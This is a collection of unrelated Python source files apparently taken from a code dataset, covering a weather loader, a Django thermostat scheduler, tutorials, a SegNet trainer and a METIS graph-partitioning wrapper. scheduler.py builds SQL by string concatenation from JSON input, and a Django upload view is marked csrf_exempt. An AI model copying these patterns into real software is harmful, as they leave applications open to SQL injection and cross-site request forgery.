cr.weather_public_path + next_date_str + \".csv\"\n\n while next_date <= utc_to_local(datetime.datetime.today() - datetime.timedelta(days=1)):\n if os.path.isfile(path_weather):\n print(next_date_str)\n df = pandas.read_csv(path_weather, sep=';|\"', engine='python') # getting data to DataFrame\n # drop duplicates and converting to right types\n df = df.drop_duplicates()\n df['local_datetime'] = pandas.to_datetime(df['local_datetime'])\n if df['temperature'].dtype == np.object:\n df['temperature'] = pandas.to_numeric(df['temperature'].str.replace(',', '.'))\n\n cities = df.city.unique() #unique cities in csv\n for city in cities:\n city_df = df[df['city'] == city]\n h15_found = False\n for index, row in city_df.iterrows():\n if row['local_datetime'].hour == 15:\n #print(row)\n actual_data.append((row['temperature'], row['city'], row['local_date']))\n h15_found = True\n if not h15_found:\n actual_data.append((city_df[\"temperature\"].mean(), city_df.iloc[0]['city'],\n city_df.iloc[0]['local_date']))\n else:\n print(\"{} csv not found\".format(next_date_str))\n # next date\n next_date += datetime.timedelta(days=1)\n next_date_str = next_date.strftime(\"%d.%m.%Y\")\n path_weather = cr.weather_public_path + next_date_str + \".csv\"\n\n # Insert in SQL Table\n cur2 = con.cursor()\n cur2.bindarraysize = len(actual_data[0])\n cur2.executemany(\"insert into vklim.weather(temp, city, date_temp) values (:1, :2, :3)\", actual_data)\n con.commit()\n\n # print(actual_data)\n cur.close()\n cur2.close()\n con.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/weather_dwh_update.py","file_name":"weather_dwh_update.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"649509850","text":"#/usr/bin/python\nimport sys\nfrom log import Log\nfrom django.db import connection\n\ndef get_scheduled_target_temperature(day_of_week, hour, minute):\n with connection.cursor() as c:\n query = '''SELECT hour, minute, temperature, id FROM Schedule WHERE day_of_week = ''' + str(day_of_week) + ''' AND ((hour < ''' + str(hour) + ''') OR (hour = ''' + str(hour) + ''' AND minute <= ''' + str(minute) + ''')) ORDER BY hour DESC, minute DESC'''\n c.execute(query)\n \n value = c.fetchone()\n if value is not None :\n return int(value[2]), int(value[3])\n else :\n if day_of_week > 0:\n return get_scheduled_target_temperature(day_of_week - 1, 23, 59)\n else :\n return get_scheduled_target_temperature(6, 23, 59)\n\ndef get_schedule():\n with connection.cursor() as c:\n c.execute('''SELECT * FROM Schedule''') \n value = c.fetchall()\n return value\n\ndef set_schedule_by_json(json_data):\n with connection.cursor() as c:\n for sched in json_data:\n query = '''UPDATE Schedule SET hour = ''' + str(sched['hour']) + ''', minute = ''' + str(sched['minute']) + ''', temperature = ''' + str(sched['temperature']) + ''' WHERE id = ''' + str(sched['id'])\n c.execute(query)\n","sub_path":"rpi-thermostat-django/app/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48227726","text":"#https://likegeeks.com/python-gui-examples-tkinter-tutorial/\n\nfrom tkinter import *\n\nwindow = Tk()\nwindow.geometry('350x200')\nwindow.title(\"Welcome to Victors App\")\n\n#Normal Text\nlbl = Label(window, text=\"Hello\")\nlbl.grid(column=0, row=0)\n\n#Input box\ntxt = Entry(window,width=10)\ntxt.grid(column=1, row=0)\n\n#Buttton\ndef clicked():\n res = \"I want \" + txt.get()\n lbl.configure(text= res)\n\nbtn = Button(window, text=\"Click Me\", command=clicked)\nbtn.grid(column=2, row=0)\n\n#Check-Box\nchk_state = BooleanVar()\nchk_state.set(0) #set check state\nchk = Checkbutton(window, text='Choose', var=chk_state)\nchk.grid(column=0, row=1)\n\n#Combo-Box\ncombo = Combobox(window)\ncombo['values']= (1, 2, 3, 4, 5, \"Text\")\ncombo.current(1) #set the selected item\ncombo.grid(column=0, row=2)\n\nwindow.mainloop()\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32511872","text":"# 正则表达式\n# JSON(xml)\n'''\n正则表达式是一个特殊的字符序列,检测一个字符串是否与\n我们所设定的这样的字符序列相匹配\n\n快速检索文本,实现一些替换文本的操作\n1.检查一串数字是否是电话号码\n2.检查一个字符串是否符合email\n3.把一个文本里指定的单词替换为另外一个单词\n\n'''\nimport re\n\na = 'C|C++|Java|C#|Python|Javascript'\nr =re.findall('Python', a)\n# 规则\nif len(r)>0:\n print(\"YES\")\nelse:\n print(\"NO\")\n","sub_path":"python/regex/re1.py","file_name":"re1.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333470734","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nTIPOS_ROUPAS = (\n (1, \"Camisa\"),\n (2, \"Camiseta/Blusa\"),\n (3, \"Edredon\"),\n (4, \"Lencol\"),\n (5, \"Roupa de Luxo\"),\n (6, \"Roupa Intima\"),\n (7, \"Roupa Jeans\"),\n (8, \"Toalha de Banho\"),\n (9, \"Toalha de Mesa\"),\n (10, \"Toalha de Rosto\")\n)\n\nDEFAULT_TIPO_ROUPAS = 2\n","sub_path":"virtual/lavanderia/pedido/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"532142152","text":"np.random.seed(1234)\n\nmean = [4,3.5]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist1 = np.random.multivariate_normal(mean, cov, size)\n\nmean = [-1,-1]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist2 = np.random.multivariate_normal(mean, cov, size)\n\nmean = [-1,1]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist3 = np.random.multivariate_normal(mean, cov, size)\n\nmean = [1,-1]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist4 = np.random.multivariate_normal(mean, cov, size)\n\npuntos1 = np.append(puntos_dist1,puntos_dist2,axis=0)\npuntos2 = np.append(puntos_dist3,puntos_dist4,axis=0)\n\npuntos = np.append(puntos1, puntos2, axis = 0)\n\nxprima2 = kmeans(puntos, 4)\n","sub_path":"ssolano586/build/lib/ssolano586/script_prueba.py","file_name":"script_prueba.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"569747657","text":"import unittest\n\nfrom botworx.run.behavior import *\n\nclass Test(unittest.TestCase):\n def test(self):\n with action() as a:\n\n async def fn():\n print(\"Hi\")\n\n a.use(fn)\n a.run()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_action.py","file_name":"test_action.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135763177","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.contrib.auth import authenticate\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_401_UNAUTHORIZED\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt,csrf_protect\n\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View,ListView,DetailView,CreateView,UpdateView,DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import redirect\nfrom django.utils import timezone\nimport sys\nimport json\nfrom django.http import HttpResponseForbidden\nfrom django.http import Http404\n\nfrom .models import User\nfrom company.models import Company\nfrom department.models import Section\n\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef upload(request):\n\tresponse_msg = ''\n\tif request.method=='POST':\n\t\ttry :\n\t\t\timport datetime\n\t\t\tdata = json.loads(request.body.decode(\"utf-8\"))\n\t\t\t# Show all data\n\t\t\tfor key in data:\n\t\t\t\tprint (key,data[key])\n\t\t\ten \t\t\t\t= data['en']\n\t\t\tfirst_name \t\t= data['first_name']\n\t\t\tlast_name \t\t= data['last_name']\n\t\t\tsection\t\t\t= data['section']\n\t\t\tcompany \t\t= data['company']\n\t\t\tusername \t\t= data['username']\n\t\t\t# get company\n\t\t\tobjCompany \t\t= Company.objects.get(name=company)\n\t\t\t# get section\n\t\t\tobjSection \t\t= Section.objects.get(name=section)\n\n\t\t\tm = User.objects.create(username=username,en=en,first_name=first_name,last_name=last_name,\n\t\t\t\t\t\t\t\t\tsection=objSection,company=objCompany)\n\n\t\t\tresponse_msg={'msg':'successful',\n\t\t\t\t\t\t\t'successful':True,\n\t\t\t\t\t\t\t'user': username}\n\t\texcept OSError as err:\n\t\t\tresponse_msg={'msg':\"OS error: {0}\".format(err),\n\t\t\t\t\t\t\t'created':False}\n\t\texcept ValueError:\n\t\t\tresponse_msg={'msg':\"Object of type 'type' is not JSON serializable\",\n\t\t\t\t\t\t\t'created':False}\n\n\t\texcept TypeError:\n\t\t\tresponse_msg={'msg':sys.exc_info()[0],\n\t\t\t\t\t\t\t'created':False}\n\t\texcept:\n\t\t\tresponse_msg={'msg':sys.exc_info()[0],\n\t\t\t\t\t\t\t'created':False}\n\n\treturn JsonResponse (response_msg)\n\n@api_view([\"POST\"])\ndef login(request):\n\tusername = request.data.get(\"username\")\n\tpassword = request.data.get(\"password\")\n\n\tuser = authenticate(username=username, password=password)\n\tif not user:\n\t\treturn Response({\"error\": \"Login failed\"}, status=HTTP_401_UNAUTHORIZED)\n\n\ttoken, _ = Token.objects.get_or_create(user=user)\n\treturn Response({\"token\": token.key})\n\n\nclass UserListView(LoginRequiredMixin,ListView):\n\tmodel = User\n\nclass UserDetailView(LoginRequiredMixin,DetailView):\n\tmodel = User\n\tcontext_object_name = 'emp'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\t\tmode \t\t\t\t= self.request.GET.get('mode', None)\n\t\treport_date \t\t= timezone.now()\n\t\tcontext['now'] \t\t= report_date\n\t\tcontext['mode'] \t= mode\n\t\treturn context\n\n\tdef get(self, request, *args, **kwargs):\n\t\ttry:\n\t\t\tself.object = self.get_object()\n\t\t\tuser \t\t= self.request.user\n\t\t\tsection \t= user.section\n\t\t\tdepartment \t= section.department\n\t\t\t# # print ('Object Department %s' % self.object.section.department)\n\t\t\t# # print ('Request Department %s' % department)\n\t\t\tif (self.object.section.department != department) and not user.groups.filter(name__in=['HR staff']).exists() :\n\t\t\t\treturn HttpResponseForbidden()\n\t\texcept Http404:\n\t\t\t# redirect here\n\t\t\treturn redirect('\\'')\n\t\tcontext = self.get_context_data(object=self.object)\n\t\treturn self.render_to_response(context)","sub_path":"employee/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"592591371","text":"# Library imports\nimport datetime\n\n\n# Custom files that we write from scratch:\n# app.py, api_calls.py, data.py, sandbox.py, utils.py\n# Each file has it's description in it\n\n# utils.py:\n# This page has the general functions/variables we've implemented\n\ndef getTodayString():\n # Returns today as a string in \"YYYY-mm-dd\" format\n # Used multiple times in api_calls\n date = datetime.datetime.now()\n return str(date.year) + \"-\" + str(date.month) + \"-\" + str(date.day)\n\n\ndef getFreeID(dictionary):\n # Gets dictionary as input, returns the first integer that is not being used\n # Used in data.api[\"favorites\"] to fina a free slot\n key = 0\n while key in dict.keys(dictionary):\n key += 1\n return key\n\n\n# The Json on the main menu\nmainMenu = {\n \"Main Menu\": {\n \"Possible routes that are available\": {\n \"/\": \"This Page\",\n \"/apod\": {\n \"/apod\": \"apod.html with the Astronomical Picture of the Day of today\",\n \"/apod/\": \"apod.html with the Astronomical Picture of the Day of \",\n },\n \"/api/apod\": {\n \"/api/apod\": \"Get the \\\"Astronomical Picture of the Day API\\\" of today\",\n \"/api/apod/\": \"Get the \\\"Astronomical Picture of the Day API\\\" of \",\n },\n \"/api/favorites\": {\n \"/api/favorites\": \"GET the favorites\",\n \"/api/favorites/add\": \"POST a json into favorites\",\n \"/api/favorites/remove\": \"REMOVE an id from favorites\"\n },\n \"/api/news\": {\n \"/api/news\": \"Get the \\\"news API\\\" of today\",\n \"/api/news/\": \"Get the \\\"news API\\\" of \",\n },\n \"Errors\": {\n \"/\": {\"404\": \"not found\"},\n }\n }\n }\n}\n","sub_path":"practice-app/cmpe352API/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"490117273","text":"\"\"\"\n // Time Complexity :O(n)\n // Space Complexity :O(n)\n // Did this code successfully run on Leetcode : YES\n // Any problem you faced while coding this : NA\n if s[i] is numeric, calculate number\n if s[i] is either + or - sign;push the number in stack\n if s[i] is either * or /; pop from the stack, perform operation and push the result\n if i is last index of s; push the element as it is\n In the end-> add all the elements of stack untill it's empty\n\"\"\"\nclass Solution:\n def calculate(self, s: str) -> int:\n if s is None or len(s) == 0: return 0\n number = 0\n lastsign = \"+\"\n stack = []\n result = 0\n n = len(s) - 1\n for i in range(len(s)):\n if s[i].isdigit() == True:\n number = number*10+int(s[i])\n if (s[i].isdigit() == False and s[i] !=\" \") or i ==n:\n if lastsign == \"+\": stack.append(number)\n elif lastsign == \"-\": stack.append(-number)\n elif lastsign == \"*\": stack.append(stack.pop()*number)\n elif lastsign == \"/\": stack.append(int(stack.pop()/number))\n number = 0\n lastsign = s[i]\n\n while stack:\n result += stack.pop()\n return result\n","sub_path":"99BasicCalculatorII.py","file_name":"99BasicCalculatorII.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46075521","text":"from fairseq.models.roberta import RobertaModel\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\ntokenizer = TreebankWordTokenizer()\n\n\nimport sys\n\nmodel = sys.argv[1]\nassert model == \"SST-2\"\n\nroberta = RobertaModel.from_pretrained(\n f'checkpoints_{model}/',\n checkpoint_file='checkpoint_best.pt',\n data_name_or_path=f'{model}-bin'\n)\n\nimport torch\nlabel_fn = lambda label: roberta.task.label_dictionary.string(\n torch.LongTensor([label + roberta.task.label_dictionary.nspecial])\n)\nncorrect, nsamples = 0, 0\nroberta.cuda()\nroberta.eval()\nevaluatedSoFar = set()\nwith open('../Robustness-Low-Synergy-and-Cheap-Computation/experiments/202-sst2/Submiterator-master/provided-alternatives_labeled.tsv', \"w\") as outFile:\n with open(f'../Robustness-Low-Synergy-and-Cheap-Computation/experiments/202-sst2/Submiterator-master/provided-alternatives.tsv', 'r') as fin:\n while True:\n line = next(fin).strip()\n try:\n original, subsets, neighbor = line.strip().split(\"\\t\")\n except ValueError:\n print(\"ValueError: \", line)\n continue\n for alternative in [original, neighbor]:\n alternativeOriginal = alternative.strip()\n\n alternatives = [\" \".join(tokenizer.tokenize(alternative))]\n alternatives = alternatives[:1]\n for i in range(1):\n alternatives[i] = alternatives[i].strip()\n\n \n \n sentences = alternatives\n if alternativeOriginal in evaluatedSoFar:\n continue\n evaluatedSoFar.add(alternativeOriginal)\n if len(evaluatedSoFar) % 100 == 0:\n print(len(evaluatedSoFar), sentences)\n tokens = roberta.encode(sentences[0])\n prediction = roberta.predict('sentence_classification_head', tokens)\n prediction_label = label_fn(prediction.argmax().item())\n prediction = [float(x) for x in prediction.view(-1)]\n print(\"\\t\".join([alternativeOriginal, str(prediction[1]), prediction_label]), file=outFile)\n# except StopIteration:\n # pass\n","sub_path":"getPredictionsSST2Alternatives_HumanGenerated_202-sst.py","file_name":"getPredictionsSST2Alternatives_HumanGenerated_202-sst.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"190648510","text":"import numpy as np\nimport tensorflow as tf\nfrom keras import layers, Input, Model, Sequential, optimizers\nfrom keras.layers import Reshape, Merge, Lambda\nfrom keras.layers import Layer, Dense, Dropout, Activation, Flatten, Reshape, Permute\nfrom keras.layers import BatchNormalization\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.optimizers import Adam, SGD\nfrom keras.preprocessing import image\nimport keras.backend as K\nfrom keras.engine import Layer\nfrom keras.utils import multi_gpu_model, np_utils\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\n#checkpoint = ModelCheckpoint('seg.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='max')\n#earlystop = EarlyStopping(monitor='val_loss', patience=5, mode='max')\n#callback_list = [earlystop]\nimport os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\n\nGPU_MEMORY_FRACTION = 1.0\nDATA_SHAPE = 224\n# hyparameters to tune\nBATCH_SIZE = 128\nLEARNING_RATE = 5e-6\nEPOCHS = 200\nCLASS_WEIGHT = np.array([1,10])\n\ndef segnet(shape=224):\n kernel = 3\n filter_size = 64\n pad = 1\n pool_size = 2\n model = Sequential()\n model.add(Layer(input_shape=(shape , shape ,3)))\n # encoder\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(filter_size, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(128, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(256, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Conv2D(512, (kernel, kernel), padding='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n # decoder\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(512, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(256, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(128, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Conv2D(filter_size, (kernel, kernel), padding='valid'))\n model.add( BatchNormalization())\n model.add(Conv2D(2, (1, 1), padding='valid',))\n model.outputHeight = model.output_shape[-2]\n model.outputWidth = model.output_shape[-3] \n model.add(Activation('softmax'))\n return model\n\ndef config_keras_backend(fraction):\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = fraction \n sess = tf.Session(config=config)\n K.set_session(sess)\n \ndef weighted_categorical_crossentropy(weights):\n weights = K.variable(weights)\n def loss(y_true, y_pred):\n y_pred /= K.sum(y_pred, axis=-1, keepdims=True)\n y_pred = K.clip(y_pred, K.epsilon(), 1 - K.epsilon())\n loss = y_true * K.log(y_pred) * weights\n loss = -K.sum(loss, -1)\n return loss\n return loss\n \n \nif __name__ == '__main__':\n print(\"********** loading labels **********\")\n train_labels = np.load('/home/mc16/pre_data/train_label_%s.npy'%DATA_SHAPE)\n val_labels = np.load('/home/mc16/pre_data/val_label_%s.npy'%DATA_SHAPE)\n \n print(\"********** loading images **********\")\n train_images = np.load('/home/mc16/pre_data/train_image_%s.npy'%DATA_SHAPE)\n val_images = np.load('/home/mc16/pre_data/val_image_%s.npy'%DATA_SHAPE)\n \n print(\"********** building model **********\")\n config_keras_backend(GPU_MEMORY_FRACTION)\n seg = segnet(DATA_SHAPE)\n parallel_seg = multi_gpu_model(seg,gpus=4)\n \n print('********** training... **********')\n loss = weighted_categorical_crossentropy(CLASS_WEIGHT)\n adam = Adam(lr=LEARNING_RATE)\n parallel_seg.compile(loss=loss, optimizer=adam, metrics=['accuracy'])\n parallel_seg.fit(x = train_images, \n y = train_labels,\n batch_size = BATCH_SIZE,\n epochs = EPOCHS,\n verbose = 1,\n validation_data = (val_images, val_labels),\n shuffle = True)\n print('********** saveing mdoel **********')\n seg.save('seg_1.h5')","sub_path":"model7_segcrf/s612.py","file_name":"s612.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88954104","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport shutil\n\nimport nysol.mcmd as nm\nimport nysol.util as nu\nimport nysol.util.margs as margs\nfrom nysol.util.mtemp import Mtemp\nfrom nysol.util.mrecount import mrecount\n\nfrom nysol.mining import extcore as extMining\n\n\nclass mgpmetis(object):\n\n\thelpMSG=\"\"\"\n----------------------------\nmgpmetis.rb version #{$version}\n----------------------------\n概要) METISを利用したグラフ分割(クラスタリング)\n特徴) 1) 節点数をできるだけ同じようにして、枝のカット数を最小化するように分割する。\n 2) 節点と枝に重みを与えることも可能。\n 3) 一つの節点が複数のクラスタに属することはない(ハードクラスタリング)。\n 4) 内部ではgpmetisコマンドをコールしている。\n用法) mgpmetis.rb kway= [ptype=rb|kway] ei= [ef=] [ew=] [ni=] [nf=] [nw=] [o=]\n [balance=] [ncuts=] [dat=] [map=] [-noexe] [--help]\n\n ファイル関連\n ei= : 枝ファイル名(節点ペア)【必須】\n ef= : 枝ファイル上の節点ペア項目名(2項目のみ)【デフォルト:\"node1,node2\"】\n ew= : 枝ファイル上の重み項目名(1項目のみ)【オプション:省略時は全ての枝の重みを1と見なす】\n : 重みは整数で指定しなければならない。\n ni= : 節点ファイル名【オプション*注1】\n nf= : 節点ファイル上の節点項目名(1項目のみ)【デフォルト:\"node\"】\n nw= : 節点ファイル上の重み項目名(複数項目指定可)【オプション:省略時は全ての重みを1と見なす】\n : 重みは整数で指定しなければならない。\n o= : 出力ファイル名【オプション:defaultは標準出力】\n\n 動作の制御関連\n kway= : 分割数【必須】\n ptype= : 分割アルゴリズム【デフォルト:kway】\n balance= : 分割アンバランスファクタ【デフォルト: ptype=rbの時は1.001、ptype=kwayの時は1.03】\n ncuts= : 分割フェーズで、初期値を変えて試行する回数【オプション:default=1】\n seed= : 乱数の種(0以上の整数)【オプション:default=-1(時間依存)】\n\n gpmetis用のデータ生成\n dat= : 指定されたファイルにgpmetisコマンド用のデータを出力する。\n map= : 指定されたファイルにgpmetisコマンド用の節点番号とi=上の節点名のマッピングデータを出力する。\n -noexe : 内部でgpmetisを実行しない。dat=,map=の出力だけが必要な場合に指定する。\n\n その他\n\t--help : ヘルプの表示\n\n 注1:節点ファイルは、孤立節点(一つの節点からのみ構成される部分グラフ)がある場合、\n もしくは節点の重みを与えたいときのみ指定すればよい。\n 注2:節点もしくは枝の重みを与えない時は、内部的に全ての重みを1として計算する。\n\n必要なソフトウェア)\n gpmetis(metis-5.1.0)\n インストールは以下のURLより行う。\n http://glaros.dtc.umn.edu/gkhome/metis/metis/download\n\n入力データ)\n 節点ペアのCSVファイル(ファイル名はei=にて指定)\n\t例:\n node1,node2,weight\n a,b,1\n a,c,2\n a,e,1\n b,c,2\n b,d,1\n c,d,2\n c,e,3\n d,f,2\n d,g,5\n e,f,2\n f,g,6\n\n\n出力データ)\n 節点とクラスタ番号のCSVデータ(ファイル名はo=にて指定)\n node,cluster\n a,2\n b,1\n c,2\n d,0\n e,0\n f,0\n g,1\n\n# Copyright(c) NYSOL 2012- All Rights Reserved.\n\n\"\"\"\n\n\tverInfo=\"version=0.1\"\n\n\tparamter = {\t\n\t\t\"ei\":\"str\",\n\t\t\"ef\":\"fld\", # \"str\"\n\t\t\"ew\":\"str\",\n\t\t\"ni\":\"str\",\n\t\t\"nf\":\"fld\",\n\t\t\"nw\":\"str\",\n\t\t\"o\":\"file\",\n\t\t\"kway\":\"int\",\n\t\t\"ptype\":\"str\",\n\t\t\"balance\":\"float\",\n\t\t\"ncuts\":\"int\",\n\t\t\"dat\":\"file\",\n\t\t\"map\":\"str\",\n\t\t\"seed\":\"int\",\n\t\t\"verbose\":\"bool\",\n\t\t\"noexe\":\"bool\"\n\t}\n\tparamcond = {\t\n\t\t\"hissu\": [\"kway\",\"ei\"]\n\t}\t\n\n\tdef help():\n\t\tprint(mgpmetis.helpMSG) \n\n\tdef ver():\n\t\tprint(mgpmetis.verInfo)\n\n\tdef __param_check_set(self , kwd):\n\n\t\t# 存在チェック\n\t\tfor k,v in kwd.items():\n\t\t\tif not k in mgpmetis.paramter\t:\n\t\t\t\traise( Exception(\"KeyError: {} in {} \".format(k,self.__class__.__name__) ) )\n\n\t\tself.msgoff = True\n\n\n\t\tself.kway = int(kwd[\"kway\"])\n\t\tself.oFile = kwd[\"o\"] if \"o\" in kwd else None\n\t\tself.eFile = kwd[\"ei\"]\n\t\tself.nFile = kwd[\"ni\"] if \"ni\" in kwd else None\n\t\tself.dFile = kwd[\"dat\"] if \"dat\" in kwd else None\n\t\tself.mFile = kwd[\"map\"] if \"map\" in kwd else None\n\n\t\tif \"ef\" in kwd :\n\t\t\tef0 = kwd[\"ef\"].split(\",\")\n\t\t\tself.ef1 = ef0[0]\n\t\t\tself.ef2 = ef0[1] \n\t\telse:\n\t\t\tself.ef1 = \"node1\"\n\t\t\tself.ef2 = \"node2\" \n\t\t\t\n\t\tself.ew = kwd[\"ew\"] if \"ew\" in kwd else None\n\t\tself.nf = kwd[\"nf\"] if \"nf\" in kwd else None\n\t\tself.nw = kwd[\"nw\"] if \"nw\" in kwd else None\n\t\tself.ncon=0\n\t\tif self.nw :\n\t\t\tself.ncon = len(self.nw.split(\",\"))\n\n\n\t\t# ---- other paramters\n\t\tself.ptype = kwd[\"ptype\"] if \"ptype\" in kwd else \"kway\" \n\t\tself.ncuts = int(kwd[\"ncuts\"]) if \"ncuts\" in kwd else 1 \n\t\tself.balance = float(kwd[\"balance\"]) if \"balance\" in kwd else None\n\t\tself.ufactor = None\n\t\tif self.balance :\n\t\t\tif self.balance < 1.0 :\n\t\t\t\traise( Exception(\"balance expect range (> 1.0)\" ) )\n\t\t\tself.ufactor = int((self.balance-1.0)*1000)\n\t\telse:\n\t\t\tif self.ptype==\"kway\":\n\t\t\t\tself.ufactor=30\n\t\t\telse:\n\t\t\t\tself.ufactor=1\n\n\t\tself.seed = int(kwd[\"seed\"]) if \"seed\" in kwd else -1\n\t\tself.noexe = kwd[\"noexe\"] if \"noexe\" in kwd else False\n\t\tself.verbose = kwd[\"verbose\"] if \"verbose\" in kwd else False\n\t\t\t\n\t\tself.workf = nu.Mtemp()\n\n\tdef __cmdline(self):\n\t\tcmdline = self.__class__.__name__\n\t\tfor k,v in self.args.items():\n\t\t\tif type(v) is bool :\n\t\t\t\tif v == True :\n\t\t\t\t\tcmdline += \" -\" + str(k)\n\t\t\telse:\n\t\t\t\tcmdline += \" \" + str(k) + \"=\" + str(v)\n\t\treturn cmdline \n\n\tdef __init__(self,**kwd):\n\t\t#パラメータチェック\n\t\tself.args = kwd\n\t\tself.__param_check_set(kwd)\n\n\n\n\t# ============\n\t# entry point\n\tdef run(self,**kw_args):\n\n\t\tos.environ[\"KG_VerboseLevel\"] = \"2\"\n\t\tif \"msg\" in kw_args:\n\t\t\tif kw_args[\"msg\"] == \"on\":\n\t\t\t\tos.environ['KG_ScpVerboseLevel'] = \"3\"\n\n\n\t\ttemp=Mtemp()\n\t\txxedge = temp.file()\n\t\txxnode = temp.file()\n\t\txxnam2num = temp.file()\n\t\txxnum2nam = temp.file()\n\t\txxebase = temp.file()\n\t\txxbody = temp.file()\n\n\t\te1=None\n\t\tif self.ew :\n\t\t\te1 <<= nm.mcut(f=\"%s:__node1,%s:__node2,%s:__weight\"%(self.ef1,self.ef2,self.ew),i=self.eFile)\n\t\telse:\n\t\t\te1 <<= nm.mcut(f=\"%s:__node1,%s:__node2\"%(self.ef1,self.ef2),i=self.eFile)\n\n\t\te1 <<= nm.muniq(k=\"__node1,__node2\")\n\n\n\t\te2 = nm.mfldname(i=e1,f=\"__node2:__node1,__node1:__node2\")\n\n\t\tfe =None\n\t\tfe <<= nm.muniq(k=\"__node1,__node2\",i=[e1,e2],o=xxedge)\n\t\tfe.run()\n\t\t\n\t\t# cleaning the node data (remove duplicate nodes)\n\t\tfn=None\n\t\tif self.nFile :\n\t\t\tif self.nw :\n\t\t\t\tfn <<= nm.mcut(f=\"%s:__node,%s\"%(self.nf,self.nw),i=self.nFile)\n\t\t\telse:\n\t\t\t\tfn <<= nm.mcut(f=\"%s:__node\"%(self.nf),i=self.nFile)\n\n\t\t\tfn <<= nm.muniq(k=\"__node\",o=xxnode)\n\n\t\telse:\n\t\t\txxen1 = nm.mcut(f=\"__node1:__node\",i=xxedge)\n\t\t\txxen2 = nm.mcut(f=\"__node2:__node\",i=xxedge)\n\t\t\tfn <<= nm.muniq(k=\"__node\",o=xxnode,i=[xxen1,xxen2])\n\n\t\tfn.run()\n\n\n\t\t# 節点名<=>節点番号変換表の作成\n\t\tfmap = None\n\t\tfmap <<= nm.mcut(f=\"__node\" , i=xxnode)\n\t\tfmap <<= nm.mnumber(a=\"__num\",S=1,q=True,o=xxnam2num)\n\t\tfmap 